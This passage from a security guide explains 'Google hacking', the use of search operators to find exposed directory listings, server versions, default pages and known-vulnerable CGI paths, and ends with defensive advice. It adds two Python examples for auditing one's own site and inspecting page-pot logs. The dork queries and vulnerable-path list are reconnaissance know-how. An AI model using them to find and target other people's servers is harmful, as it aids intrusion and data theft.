Only befriend people that you trust. There are too many scams circulating that
try to build trust with a target. The only problem is you have no idea who these
strangers are, and more often than not, they’re trying to take advantage of you.
...
18. Google Hacking
The Google search engine found at www.google.com offers many features, including
language and document translation; web, image, newsgroups, catalog, and news
searches; and more. These features offer obvious benefits to even the most uninitiated
web surfer, but these same features offer far more nefarious possibilities to the most
malicious Internet users, including hackers, computer criminals, identity thieves, and
even terrorists. This article outlines the more harmful applications of the Google search
engine, techniques that have collectively been termed "Google Hacking." The intent of
this article is to educate web administrators and the security community in the hopes of
eventually stopping this form of information leakage.
Basic Search Techniques
Since the Google web interface is so easy to use, I won't describe the basic functionality
of the www.google.com web page. Instead, I'll focus on the various operators available :
Use the plus sign (+) to force a search for an overly common word. Use the minus
sign (-) to exclude a term from a search. No space follows these signs.
To search for a phrase, supply the phrase surrounded by double quotes (" ").
A period (.) serves as a single-character wildcard.
An asterisk (*) represents any word, not the completion of a word, as is
traditionally used.
Google advanced operators help refine searches. Advanced operators use a syntax such
as the following:
operator:search_term
Notice that there's no space between the operator, the colon, and the search term.
The site: operator instructs Google to restrict a search to a specific web site or
domain. The web site to search must be supplied after the colon.
The filetype: operator instructs Google to search only within the text of a
particular type of file. The file type to search must be supplied after the colon.
Don't include a period before the file extension.
The link: operator instructs Google to search within hyperlinks for a search term.
The cache: operator displays the version of a web page as it appeared when
Google crawled the site. The URL of the site must be supplied after the colon.
The intitle: operator instructs Google to search for a term within the title of a
document.
The inurl: operator instructs Google to search only within the URL (web
address) of a document. The search term must follow the colon.
Google Hacking Techniques
By using the basic search techniques combined with Google's advanced operators,
anyone can perform information-gathering and vulnerability-searching using Google.
This technique is commonly referred to as Google Hacking.
Site Mapping
To find every web page Google has crawled for a specific site, use the site: operator.
Consider the following query :
site:http://www.microsoft.com Microsoft
This query searches for the word microsoft, restricting the search to
the http://www.microsoft.com web site. How many pages on the Microsoft web server contain
the word microsoft? According to Google, all of them! Google searches not only the
content of a page, but the title and URL as well. The word microsoft appears in the
URL of every page on http://www.microsoft.com. With a single query, an attacker gains a
rundown of every web page on a site cached by Google.
There are some exceptions to this rule. If a link on the Microsoft web page points back to
the IP address of the Microsoft web server, Google will cache that page as belonging to
the IP address, not the http://www.microsoft.com web server. In this special case, an
attacker would simply alter the query, replacing the word microsoft with the IP
address(es) of the Microsoft web server.
Finding Directory Listings
Directory listings provide a list of files and directories in a browser window instead of
the typical text-and-graphics mix generally associated with web pages. These pages offer
a great environment for deep information gathering (see Figure 1).
Figure 1 : A Typical Directory Listing.
Locating directory listings with Google is fairly straightforward. Figure 1 shows that
most directory listings begin with the phrase Index of, which also shows in the title. An
obvious query to find this type of page might be intitle:index.of, which may find pages
with the term index of in the title of the document. Unfortunately, this query will return
a large number of false positives, such as pages with the following titles :
Index of Native American Resources on the Internet
LibDex - Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
Judging from the titles of these documents, it's obvious that not only are these web
pages intentional, they're also not the directory listings we're looking for. Several
alternate queries provide more accurate results :
intitle:index.of "parent directory"
intitle:index.of name size
These queries indeed provide directory listings by not only focusing on index.of in the
title, but on keywords often found inside directory listings, such as parent directory, name,
and size. Obviously, this search can be combined with other searches to find files or
directories located in directory listings.
Versioning : Obtaining the Web Server Software/Version
The exact version of the web server software running on a server is one piece of
information an attacker needs before launching a successful attack against that web
server. If an attacker connects directly to that web server, the HTTP (web) headers from
that server can provide this essential information. It's possible, however, to retrieve
similar information from Google's cache without ever connecting to the target server
under investigation. One method involves using the information provided in a directory
listing.
Figure 2 shows the bottom line of a typical directory listing. Notice that the directory
listing includes the name of the server software as well as the version. An adept web
administrator can fake this information, but often it's legitimate, allowing an attacker to
determine what attacks may work against the server.
Figure 2 : Directory Listing Server
This example was gathered using the following query :
intitle:index.of server.at
This query focuses on the term index of in the title and server at appearing at the bottom
of the directory listing. This type of query can also be pointed at a particular web server :
intitle:index.of server.at site:aol.com
The result of this query indicates that gprojects.web.aol.com and vidup-r1.blue.aol.com both
run Apache web servers.
It's also possible to determine the version of a web server based on default pages
installed on that server.
When a web server is installed, it generally will ship with a set of default web pages,
like the Apache 1.2.6 page shown in Figure 3 :
Figure 3 : Apache Test Page.
These pages can make it easy for a site administrator to get a web server running. By
providing a simple page to test, the administrator can simply connect to his own web
server with a browser to validate that the web server was installed correctly. Some
operating systems even come with web server software already installed. In this case, an
Internet user may not even realize that a web server is running on his machine. This
type of casual behavior on the part of an Internet user will lead an attacker to rightly
assume that the web server is not well maintained, and by extension is insecure. By
further extension, the attacker can assume that the entire operating system of the
server may be vulnerable by virtue of poor maintenance.
The following table provides a brief rundown of some queries that can locate various
default pages.
Query
Intitle:Test.Page.for.Apache It.worked! this.web.site!
Intitle:Test.Page.for.Apache seeing.this.instead
Intitle:Simple.page.for.Apache Apache.Hook.Functions
Intitle:test.page "Hey, it worked !" "SSL/TLS-aware"
intitle:welcome.to intitle:internet IIS
intitle:"Under construction" "does not currently have"
intitle:welcome.to.IIS.4.0
allintitle:Welcome to Windows NT 4.0 Option Pack
allintitle:Welcome to Internet Information Server
allintitle:Welcome to Windows 2000 Internet Services
allintitle:Welcome to Windows XP Server Internet Services
allintitle:Netscape Enterprise Server Home Page
allintitle:Netscape FastTrack Server Home Page
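A site owner can look for the same three signals (directory listings, the server version footer, and stock default pages) in pages fetched from their own server before a search engine indexes them. The following is an added Python example, not code from the original article: `audit_page` and the sample pages are constructed, and the title list is taken from the query table above.

```python
import re
from html.parser import HTMLParser

# Titles of stock pages named in the query table above (lower-cased).
DEFAULT_TITLES = (
    "test page for apache", "simple page for apache", "welcome to iis 4.0",
    "welcome to windows nt 4.0 option pack", "welcome to internet information server",
    "welcome to windows 2000 internet services", "netscape enterprise server home page",
    "netscape fasttrack server home page",
)
# Footer line such as "Apache/1.3.27 Server at www.example.com Port 80".
BANNER = re.compile(r"([A-Za-z][\w-]*)/(\d+(?:\.\d+)+)\b.{0,120}?\bServer at\b", re.I)

# Constructed sample pages (not captured from any real server).
LISTING = ('<html><head><title>Index of /backup</title></head><body>'
           '<h1>Index of /backup</h1><pre><a href="?N=D">Name</a> <a href="?S=A">Size</a>\n'
           '<a href="/">Parent Directory</a>\n<a href="db.sql">db.sql</a> 12M</pre>'
           '<address>Apache/1.3.27 Server at intranet.example.com Port 80</address>'
           '</body></html>')
INTENTIONAL = ('<html><head><title>Index of Native American Resources on the Internet'
               '</title></head><body><p>A curated list of links.</p></body></html>')
DEFAULT = ('<html><head><title>Test Page for Apache Installation</title></head>'
           '<body><p>It worked!</p></body></html>')


class _PageText(HTMLParser):
    """Collect the <title> and the visible text of one HTML page."""

    def __init__(self):
        super().__init__()
        self._in_title = False
        self.title = ""
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        else:
            self.chunks.append(data)


def audit_page(html):
    """Report which of the article's search signatures one page would match."""
    parser = _PageText()
    parser.feed(html)
    parser.close()
    title = " ".join(parser.title.split()).lower()
    text = " ".join(" ".join(parser.chunks).split())
    banner = BANNER.search(text)
    return {
        # Title alone gives false positives; require listing keywords as well.
        "directory_listing": title.startswith("index of") and "parent directory" in text.lower(),
        "server_banner": banner.groups() if banner else None,
        "default_page": any(t in title for t in DEFAULT_TITLES),
    }


if __name__ == "__main__":
    for name, page in (("listing", LISTING), ("intentional", INTENTIONAL), ("default", DEFAULT)):
        print(name, audit_page(page))
```

On Apache, `Options -Indexes` turns off automatic listings and `ServerSignature Off` removes the version footer; stock test pages should be deleted once the installation has been verified.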
Using Google As A CGI Scanner
To accomplish its task, a CGI scanner must know what exactly to search for on a web
server. Such scanners often utilize a data file filled with vulnerable files and directories
like the one shown below:
/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi
/iissamples/ISSamples/SQLQHit.asp
/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi
Combining a list like this one with a carefully crafted Google search, Google can be used
as a CGI scanner. Each line can be broken down and used in either
an index.of or inurl search to find vulnerable targets. For example, a Google search for
this :
allinurl:/random_banner/index.cgi
returns the results shown in Figure 4.
Figure 4 : Sample Search Using A Line From A CGI Scanner.
A hacker can take sites returned from this Google search, apply a bit of hacker "magic,"
and eventually get the broken random_banner program to cough up any file on that web
server, including the password file, as shown in Figure 5.
Figure 5 : Password File Captured From A Vulnerable Site Found Using A Google Search.
Note that actual exploitation of a found vulnerability crosses the ethical line, and is not
considered mere web searching.
Of the many Google hacking techniques we've looked at, this technique is one of the best
candidates for automation, because the CGI scanner vulnerability files can be very
large. The gooscan tool performs this and many other functions. Gooscan and
automation are discussed below.
Google Automated Scanning
Google frowns on automation : "You may not send automated queries of any sort to
Google's system without express permission in advance from Google. Note that 'sending
automated queries' includes, among other things :
using any software which sends queries to Google to determine how a web site or
web page 'ranks' on Google for various queries;
'meta-searching' Google; and
performing 'offline' searches on Google."
Any user running an automated Google querying tool (with the exception of tools created
with Google's extremely limited API) must obtain express permission in advance to do
so. It's unknown what the consequences of ignoring these terms of service are, but it
seems best to stay on Google's good side.
Gooscan
Gooscan is a UNIX (Linux/BSD/Mac OS X) tool that automates queries against Google
search appliances (which are not governed by the same automation restrictions as their
web-based brethren). For the security professional, gooscan serves as a front end for an
external server assessment and aids in the information-gathering phase of a
vulnerability assessment. For the web server administrator, gooscan helps discover
what the web community may already know about a site thanks to Google's search
appliance.
Googledorks
The term "googledork" was coined by the author and originally meant "An inept or
foolish person as revealed by Google." After a great deal of media attention, the term
came to describe those who "troll the Internet for confidential goods." Either description
is fine, really. What matters is that the term googledork conveys the concept that
sensitive stuff is on the web, and Google can help you find it. The official googledorks
page lists many different examples of unbelievable things that have been dug up
through Google by the maintainer of the page. Each listing shows the Google search
required to find the information, along with a description of why the data found on each
page is so interesting.
GooPot
The concept of a honeypot is very straightforward. According to techtarget.com,
"A honey pot is a computer system on the Internet that is expressly set up to attract and
'trap' people who attempt to penetrate other people's computer systems."
To learn how new attacks might be conducted, the maintainers of a honeypot system
monitor, dissect, and catalog each attack, focusing on those attacks that seem unique.
An extension of the classic honeypot system, a web-based honeypot or "page pot"
(click here : http://www.gray-world.net/etc/passwd/ to see what a page pot may look like)
is designed to attract those employing the techniques outlined in this article. The
concept is fairly straightforward. Consider a simple googledork entry like this :
inurl:admin inurl:userlist
This entry could easily be replicated with a web-based honeypot by creating
an index.html page that referenced another index.html file in
an /admin/userlist directory. If a web search engine such as Google was instructed to
crawl the top-level index.html page, it would eventually find the link pointing
to /admin/userlist/index.html. This link would satisfy the Google query of inurl:admin
inurl:userlist, eventually attracting a curious Google hacker.
The referrer variable can be inspected to figure out how a web surfer found a web page
through Google. This bit of information is critical to the maintainer of a page pot system,
because it outlines the exact method the Google searcher used to locate the page pot
system. The information aids in protecting other web sites from similar queries.
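The referrer inspection described above can be done directly on the web server's access log. The following is an added Python example, not part of GooPot or the original article: the log lines are constructed, Apache "combined" log format is assumed, and `page_pot_hits` and `google_query` are hypothetical names.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in Apache "combined" format (sample data).
# The page-pot path mirrors the /admin/userlist/index.html example above.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2016:10:01:02 +0000] "GET /admin/userlist/index.html HTTP/1.1" 200 512 "http://www.google.com/search?q=inurl%3Aadmin+inurl%3Auserlist&hl=en" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2016:10:05:40 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2016:11:17:09 +0000] "GET /admin/userlist/index.html HTTP/1.1" 200 512 "http://www.google.co.uk/search?hl=en&q=intitle%3Aindex.of+%22parent+directory%22" "Mozilla/5.0"
192.0.2.44 - - [12/Mar/2016:11:20:00 +0000] "GET /admin/userlist/index.html HTTP/1.1" 200 512 "http://google.com.evil.example/search?q=inurl%3Aadmin" "curl/7.47"
"""

LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] "\S+ (?P<path>\S+)[^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
# Loose match for Google search hosts. The Referer header is supplied by the
# client, so treat it as a hint about the searcher, never as proof.
GOOGLE_HOST = re.compile(r"^(?:www\.)?google\.(?:com|[a-z]{2,3})(?:\.[a-z]{2})?$")
# The advanced operators listed earlier in this article.
OPERATOR = re.compile(
    r"(?<![a-z])(allintitle|allinurl|intitle|inurl|site|filetype|link|cache):", re.I
)


def google_query(referer):
    """Return the decoded q= search string if the referrer is a Google search."""
    try:
        parts = urlsplit(referer)
        host = (parts.hostname or "").lower()
    except ValueError:
        return None
    if not GOOGLE_HOST.match(host):
        return None
    values = parse_qs(parts.query).get("q")
    return values[0] if values else None


def page_pot_hits(log_text, pot_prefix="/admin/userlist/"):
    """List visits to the page pot that carry a recoverable Google query."""
    hits = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m or not m.group("path").startswith(pot_prefix):
            continue
        query = google_query(m.group("referer"))
        if query is None:
            continue
        hits.append({
            "ip": m.group("ip"),
            "when": m.group("when"),
            "query": query,
            "operators": [op.lower() for op in OPERATOR.findall(query)],
        })
    return hits


if __name__ == "__main__":
    for hit in page_pot_hits(SAMPLE_LOG):
        print(hit["when"], hit["ip"], hit["operators"], hit["query"])
```

Search engines today often send only their origin as the referrer, in which case no query is recoverable and the line is skipped.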
GooPot, the Google honeypot system, uses enticements based on the many techniques
outlined in the googledorks collection and this document. In addition, the GooPot more
closely resembles the juicy targets that Google hackers typically go after. The
administrator of the googledorks list utilizes the GooPot to discover new search types
and to publicize them in the form of googledorks listings, creating a self-sustaining cycle
for learning about and protecting from search engine attacks.
Although the GooPot system is currently not publicly available, expect it to be made
available early in the second quarter of 2004.
Protecting Yourself from Google Hackers
The following list provides some basic methods for protecting yourself from Google
Hackers :
Keep your sensitive data off the web! Even if you think you're only putting
your data on a web site temporarily, there's a good chance that you'll either
forget about it, or that a web crawler might find it. Consider more secure ways of
sharing sensitive data, such as SSH/SCP or encrypted email.
Googledork! Use the techniques outlined in this article (and the full Google
Hacker's Guide) to check your site for sensitive information or vulnerable files.
Use gooscan to scan your site for bad stuff, but first get advance express
permission from Google! Without advance express permission, Google could come
after you for violating their terms of service. The author is currently not aware of
the exact implications of such a violation. But why anger the "Goo-Gods"?!
Consider removing your site from Google's index. The Google webmasters
FAQ provides invaluable information about ways to properly protect and/or
expose your site to Google. From that page: "Please have the webmaster for the
page in question contact us with proof that he/she is indeed the webmaster. This
proof must be in the form of a root level page on the site in question, requesting
removal from Google. Once we receive the URL that corresponds with this root
level page, we will remove the offending page from our index." In some cases, you
may want to remove individual pages or snippets from Google's index. This is
also a straightforward process that can be